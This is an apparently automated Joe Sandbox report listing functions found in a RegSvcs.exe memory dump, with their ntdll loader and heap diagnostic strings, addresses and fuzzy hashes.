                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                            • API String ID: 0-1700792311
                                            • Opcode ID: ad575231fad2d3ad13a2eb6304901087ddc875b52ae4b2d32f640854e15854c5
                                            • Instruction ID: 533b334302240e05703be164d7095098120d59572ad315e9f7b4b75d0b4f7511
                                            • Opcode Fuzzy Hash: ad575231fad2d3ad13a2eb6304901087ddc875b52ae4b2d32f640854e15854c5
                                            • Instruction Fuzzy Hash: F4D1F031604689DFDB22DF68C440AADBBF6FF5A700F0C8449F8499B256E7369AC1CB51
                                            Function 018E89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                            Download Yara Rule
                                            Strings
                                            • VerifierDebug, xrefs: 018E8CA5
                                            • AVRF: -*- final list of providers -*- , xrefs: 018E8B8F
                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 018E8A67
                                            • HandleTraces, xrefs: 018E8C8F
                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 018E8A3D
                                            • VerifierFlags, xrefs: 018E8C50
                                            • VerifierDlls, xrefs: 018E8CBD
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                            • API String ID: 0-3223716464
                                            • Opcode ID: 76601a613e7cde53634ed72bf88f50c6417f24b5b3b8eb279ef0ca6b235e60f0
                                            • Instruction ID: ee931efdce7b7ac5ad2420b2523b192aea69bb29f66e77a40c7d2cdbeca4131f
                                            • Opcode Fuzzy Hash: 76601a613e7cde53634ed72bf88f50c6417f24b5b3b8eb279ef0ca6b235e60f0
                                            • Instruction Fuzzy Hash: 1B912571649706EFEB21DF2C8888B1E77E4AB97754F060418FA45EB242D770AF00C792
                                            Function 0186EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                            • API String ID: 0-1109411897
                                            • Opcode ID: 6051ead1c4854303be9461607b9e285e0d3ec967a26276374a4135afbc115e64
                                            • Instruction ID: 3b77b655f59ee3ab4fca7237410eb2801f1d85fba1adf029ffd5f3f37fea4cf2
                                            • Opcode Fuzzy Hash: 6051ead1c4854303be9461607b9e285e0d3ec967a26276374a4135afbc115e64
                                            • Instruction Fuzzy Hash: 56A22774A0562ACBDB65CF18CCA8BA9BBB5AF45704F2442E9D909E7251DB309FC5CF00
                                            Function 018963FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-792281065
                                            • Opcode ID: d756b681a7f33be34b1b3c330868ec246ef73ffd94a469916c78ba18994056ec
                                            • Instruction ID: 41c0861ccc94c573cb86d7c254de2fe22543797d83534b352b470ffc372c66b2
                                            • Opcode Fuzzy Hash: d756b681a7f33be34b1b3c330868ec246ef73ffd94a469916c78ba18994056ec
                                            • Instruction Fuzzy Hash: 38912B71B043199BEF35DF6CD885BAE7BA1BB41B24F180129E904FB681EB749B01C791
                                            Function 0185645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                            Download Yara Rule
                                            Strings
                                            • Getting the shim user exports failed with status 0x%08lx, xrefs: 018B9A01
                                            • apphelp.dll, xrefs: 01856496
                                            • Loading the shim user DLL failed with status 0x%08lx, xrefs: 018B9A2A
                                            • LdrpInitShimEngine, xrefs: 018B99F4, 018B9A07, 018B9A30
                                            • minkernel\ntdll\ldrinit.c, xrefs: 018B9A11, 018B9A3A
                                            • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 018B99ED
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-204845295
                                            • Opcode ID: c94a6a79b5f8114c81daa61d7420ee971df3dd3228fe9a9cf8592dcef6e5a529
                                            • Instruction ID: 287c8f2f22a3f545ed81a6aeeac0980b08dac1002d9c995cf74d87a7272890d2
                                            • Opcode Fuzzy Hash: c94a6a79b5f8114c81daa61d7420ee971df3dd3228fe9a9cf8592dcef6e5a529
                                            • Instruction Fuzzy Hash: 755191716483099FE721DF28D881AAB7BE5FB84748F54051DFA85E7251EA30EB04CB93
                                            Function 0189C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 018D8181, 018D81F5
                                            • minkernel\ntdll\ldrinit.c, xrefs: 0189C6C3
                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 018D81E5
                                            • LdrpInitializeProcess, xrefs: 0189C6C4
                                            • Loading import redirection DLL: '%wZ', xrefs: 018D8170
                                            • LdrpInitializeImportRedirection, xrefs: 018D8177, 018D81EB
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-475462383
                                            • Opcode ID: 95f2639297372f960550dd599a6b4338b89b8d8a2f3a8b843847763d59e60a48
                                            • Instruction ID: 4f77e2368e067d7f92b66dc055dcedb9b673340a67ae21fadabf3e49ae932ae2
                                            • Opcode Fuzzy Hash: 95f2639297372f960550dd599a6b4338b89b8d8a2f3a8b843847763d59e60a48
                                            • Instruction Fuzzy Hash: 8131F3716483069BD310EE2CDC86E1AB7D5AF95B10F05051CF944EB291EA20EF04C7E3
                                            Function 01892674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 018D2178
                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 018D219F
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018D21BF
                                            • SXS: %s() passed the empty activation context, xrefs: 018D2165
                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 018D2180
                                            • RtlGetAssemblyStorageRoot, xrefs: 018D2160, 018D219A, 018D21BA
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                            • API String ID: 0-861424205
                                            • Opcode ID: 1ae2352ee5add0c1b0ca5a221150b34a23adc6c951d492b48b81d1e9dd8f9ac0
                                            • Instruction ID: f5d84654d52a1e7b741023faf3e5beddb9e73318508f0568a453047eabc59aed
                                            • Opcode Fuzzy Hash: 1ae2352ee5add0c1b0ca5a221150b34a23adc6c951d492b48b81d1e9dd8f9ac0
                                            • Instruction Fuzzy Hash: 6C31E936B4031977FF219AA98C85F5F7B6ADB95B54F098059BB04FB240D770AB00C7A1
                                            Function 018A096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 018A2DF0: LdrInitializeThunk.NTDLL ref: 018A2DFA
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018A0BA3
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018A0BB6
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018A0D60
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018A0D74
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                            • String ID:
                                            • API String ID: 1404860816-0
                                            • Opcode ID: b4bbf9563f151a46bb699ded3a1205c3df06fe0cfab3d83c5f76857a73a001e9
                                            • Instruction ID: 6b0b78d63afdb27dd50dcafecca5c02206bcb7988fdb7cc014a6ac79de9a1f41
                                            • Opcode Fuzzy Hash: b4bbf9563f151a46bb699ded3a1205c3df06fe0cfab3d83c5f76857a73a001e9
                                            • Instruction Fuzzy Hash: 3D426D71900715DFEB21CF28C880BAAB7F5FF44314F5485A9E989EB241E770AA85CF61
                                            Function 0186A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                            • API String ID: 0-379654539
                                            • Opcode ID: 3416ed2c4116927bee20d7794e52a9d6a718de0424d2ba363877832cc8a475e7
                                            • Instruction ID: 2b7091cde47a09a3321cf48bfd94486aa241375fbe0b3dd420a76a066bfb385f
                                            • Opcode Fuzzy Hash: 3416ed2c4116927bee20d7794e52a9d6a718de0424d2ba363877832cc8a475e7
                                            • Instruction Fuzzy Hash: FAC179741083868FD719CF58C484B6AB7E8BF84708F04496EF996EB291E734DA49CB52
                                            Function 01898402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                            Download Yara Rule
                                            Strings
                                            • @, xrefs: 01898591
                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0189855E
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01898421
                                            • LdrpInitializeProcess, xrefs: 01898422
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1918872054
                                            • Opcode ID: 2d55c51f477731903bc7315a07305f947a19b06376d6561cdd02b333e686282c
                                            • Instruction ID: 65ae609c2014e646fcff24115986dd690ea3e74ddbaaf7c7b56da426e154fd28
                                            • Opcode Fuzzy Hash: 2d55c51f477731903bc7315a07305f947a19b06376d6561cdd02b333e686282c
                                            • Instruction Fuzzy Hash: 87917C7150834AAFEB21DF65CC80EABBBE8BF85744F44492EFA84D2151E734DA058B53
                                            Function 0189273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                            Download Yara Rule
                                            Strings
                                            • .Local, xrefs: 018928D8
                                            • SXS: %s() passed the empty activation context, xrefs: 018D21DE
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018D22B6
                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018D21D9, 018D22B1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                            • API String ID: 0-1239276146
                                            • Opcode ID: 0b1a59213902272b0e6c6dd49c877dc75ec5cb9f0c7bfdbf735517502824d53b
                                            • Instruction ID: 7c3209e2e370c5f1dee1a9e53c20b7a5b99b0be9b6f45cebbbe38fd0da439afd
                                            • Opcode Fuzzy Hash: 0b1a59213902272b0e6c6dd49c877dc75ec5cb9f0c7bfdbf735517502824d53b
                                            • Instruction Fuzzy Hash: 1EA17D31941229ABDF25CF68DC84BA9B7B2BF58354F1941E9E908EB251D7309F80CF91
                                            Function 01894AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 018D3437
                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 018D342A
                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 018D3456
                                            • RtlDeactivateActivationContext, xrefs: 018D3425, 018D3432, 018D3451
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                            • API String ID: 0-1245972979
                                            • Opcode ID: 51e688fcc665fa2f943d3234434e3972d05bb30f8bf706709d850df25ad9ead0
                                            • Instruction ID: 9a44a6035b793eda918e7ba32bce5a2289810aa8caa68ab3cdb90b876b7bceed
                                            • Opcode Fuzzy Hash: 51e688fcc665fa2f943d3234434e3972d05bb30f8bf706709d850df25ad9ead0
                                            • Instruction Fuzzy Hash: 776127766007169FDB22CF1CC981B2AB7E5FF90B54F18851DE955DB240D738EA02CB92
                                            Function 018664AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                            Download Yara Rule
                                            Strings
                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 018C106B
                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 018C0FE5
                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 018C1028
                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018C10AE
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                            • API String ID: 0-1468400865
                                            • Opcode ID: 875afd53b3f10578156a4619de93ad5c3ca4abe77fedd0c3de20e09cf242379a
                                            • Instruction ID: 37398d2e7dab51193477c2ef7c58a2d035e302222d6d9469be85b547cd64d1f1
                                            • Opcode Fuzzy Hash: 875afd53b3f10578156a4619de93ad5c3ca4abe77fedd0c3de20e09cf242379a
                                            • Instruction Fuzzy Hash: AD71E0B19043459FDB60DF18C889B9B7BACAF95764F500468F948CB246E334D688CBD2
                                            Function 0188245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpDynamicShimModule, xrefs: 018CA998
                                            • apphelp.dll, xrefs: 01882462
                                            • minkernel\ntdll\ldrinit.c, xrefs: 018CA9A2
                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 018CA992
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-176724104
                                            • Opcode ID: 99932f5a79938380c917e5fa2389aac0bf33a7fde4bbb4ba55f2c9232396670b
                                            • Instruction ID: 64c51a1e8c547694cf8b3e183172d8591cb9616e2f772992d0b3194d2d0ca7e3
                                            • Opcode Fuzzy Hash: 99932f5a79938380c917e5fa2389aac0bf33a7fde4bbb4ba55f2c9232396670b
                                            • Instruction Fuzzy Hash: DB314871A00309EBDB399F6DD885AAABBB5FB80B04F15001DF910F7245E7709B81CB91
                                            Function 018729A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                            Download Yara Rule
                                            Strings
                                            • HEAP[%wZ]: , xrefs: 01873255
                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0187327D
                                            • HEAP: , xrefs: 01873264
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                            • API String ID: 0-617086771
                                            • Opcode ID: 776104fdc08c48a96310a9a60ad2b523f07e4169bbbd781180c2344b6ba0f376
                                            • Instruction ID: 50ae7bb945c58f7710e6c835e65c565ec085008abbbe9dd6de76c1ab65a90a5d
                                            • Opcode Fuzzy Hash: 776104fdc08c48a96310a9a60ad2b523f07e4169bbbd781180c2344b6ba0f376
                                            • Instruction Fuzzy Hash: 1192BB71A042499FDB25CF68C440BAEBBF2FF48304F188459E899EB392D735EA41DB51
                                            Function 01870770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            • Opcode ID: e38f0daac9e371749b83131e97aa2eb77932a8b4621359413593ab1bae211e9e
                                            • Instruction ID: fd188490260946f0a4daed8a4615810270ea78a46061a903f0a3890d619216e6
                                            • Opcode Fuzzy Hash: e38f0daac9e371749b83131e97aa2eb77932a8b4621359413593ab1bae211e9e
                                            • Instruction Fuzzy Hash: D4F18B7070060ADFEB25CF68C884B6AB7F6FB85704F148169E456DB392D734EA81CB91
                                            Function 01886962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: $@
                                            • API String ID: 2994545307-1077428164
                                            • Opcode ID: 49ae7d027245362413e5e9e7417c24200376c6049c80ec181a7f369c2e1eb5c2
                                            • Instruction ID: 7f3b5dac36b5e231d4dff25daa0d2ee96ab7043ae4ba32f9505722fa095e4ae0
                                            • Opcode Fuzzy Hash: 49ae7d027245362413e5e9e7417c24200376c6049c80ec181a7f369c2e1eb5c2
                                            • Instruction Fuzzy Hash: 04C290716083459FE725DF28C880BABBBE5BF88714F14892DF989C7241E734DA45CB52
                                            Function 0185A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: FilterFullPath$UseFilter$\??\
                                            • API String ID: 0-2779062949
                                            • Opcode ID: fa6cb2ec7355c32bfeab7e9ca15526d826a059eb5f360784ec614c820572f097
                                            • Instruction ID: eb66fd8c933f8b176927a0b60deae46aa8dbecd24a990c91f070d89691d54acb
                                            • Opcode Fuzzy Hash: fa6cb2ec7355c32bfeab7e9ca15526d826a059eb5f360784ec614c820572f097
                                            • Instruction Fuzzy Hash: 15A147719116299BDB319B68CCC8BEAB7B8EF48700F1001EAEA09E7251D7359F85CF51
                                            Function 01880BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                            Download Yara Rule
                                            Strings
                                            • Failed to allocated memory for shimmed module list, xrefs: 018CA10F
                                            • minkernel\ntdll\ldrinit.c, xrefs: 018CA121
                                            • LdrpCheckModule, xrefs: 018CA117
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-161242083
                                            • Opcode ID: 2a8e45c9c97d1966827f2e29703cbe8616c2a821c240d88e599dde10698db3cc
                                            • Instruction ID: e3a269290a43275b8ac0e931b9e8ded7ed22e6ad5831f5ac48572400218f7616
                                            • Opcode Fuzzy Hash: 2a8e45c9c97d1966827f2e29703cbe8616c2a821c240d88e599dde10698db3cc
                                            • Instruction Fuzzy Hash: D3719D71A00309DFDB29EF6CC981AAEB7B5FB84704F14406DE902E7251E734AB85CB51
                                            Function 0189C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrinit.c, xrefs: 018D82E8
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 018D82DE
                                            • Failed to reallocate the system dirs string !, xrefs: 018D82D7
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1783798831
                                            • Opcode ID: f45a6b2167ad59f6e6a20e280519e2391756e29a351ddc5ba60ec0495f4dc5ea
                                            • Instruction ID: a6968354c9c0551332414a61cb3eeb6037d68790f00a373b3f9590ae20f644c4
                                            • Opcode Fuzzy Hash: f45a6b2167ad59f6e6a20e280519e2391756e29a351ddc5ba60ec0495f4dc5ea
                                            • Instruction Fuzzy Hash: B941E271509305ABDB21EB6CD884B5F77E8EF44764F04492AF948E7254EB70DA008BA2
                                            Function 0191C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                            Download Yara Rule
                                            Strings
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0191C1C5
                                            • @, xrefs: 0191C1F1
                                            • PreferredUILanguages, xrefs: 0191C212
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                            • API String ID: 0-2968386058
                                            • Opcode ID: 8937a6c21c69054b3f531788a5164d9cf8266ca1a8b2748ca4ccb39133031803
                                            • Instruction ID: 219b52ed2d69a19c8afe070115fb6e34b02bc69324f6a3ca60f167215a7acebf
                                            • Opcode Fuzzy Hash: 8937a6c21c69054b3f531788a5164d9cf8266ca1a8b2748ca4ccb39133031803
                                            • Instruction Fuzzy Hash: 3841747194020DEBDF11DAD8C841FEEB7BCAB14701F04456AEA09E7244D774DA858B51
                                            Function 018F4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                            • API String ID: 0-1373925480
                                            • Opcode ID: 9aa114e8e7a152adac99a1fcf103f456dafd6c92ab5d58c1cec7e7bfa0977ada
                                            • Instruction ID: 2b5112020badd169df7854c8a2132122d0f022d4f4931d880b0d5399fa268d23
                                            • Opcode Fuzzy Hash: 9aa114e8e7a152adac99a1fcf103f456dafd6c92ab5d58c1cec7e7bfa0977ada
                                            • Instruction Fuzzy Hash: 68410431A006588BEB25DBE8C844BAEBBB8FF55344F14046EDB01EB781DB348B41CB12
                                            Function 018E4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 018E4899
                                            • LdrpCheckRedirection, xrefs: 018E488F
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 018E4888
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-3154609507
                                            • Opcode ID: e4c75774998b1dd1c21f69890f612d4ca5cd462e32bd74e4fdab65251a014dd2
                                            • Instruction ID: 9d2edeed81e258843b8abe8b31b1201ea1ddbc2a8dc096abcc38e362b1edb5b1
                                            • Opcode Fuzzy Hash: e4c75774998b1dd1c21f69890f612d4ca5cd462e32bd74e4fdab65251a014dd2
                                            • Instruction Fuzzy Hash: F441B032A043659BCB21CE6DD848A267BE5AF8B750F060559ED4DE7311D731DE00CBD1
                                            Function 01870BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
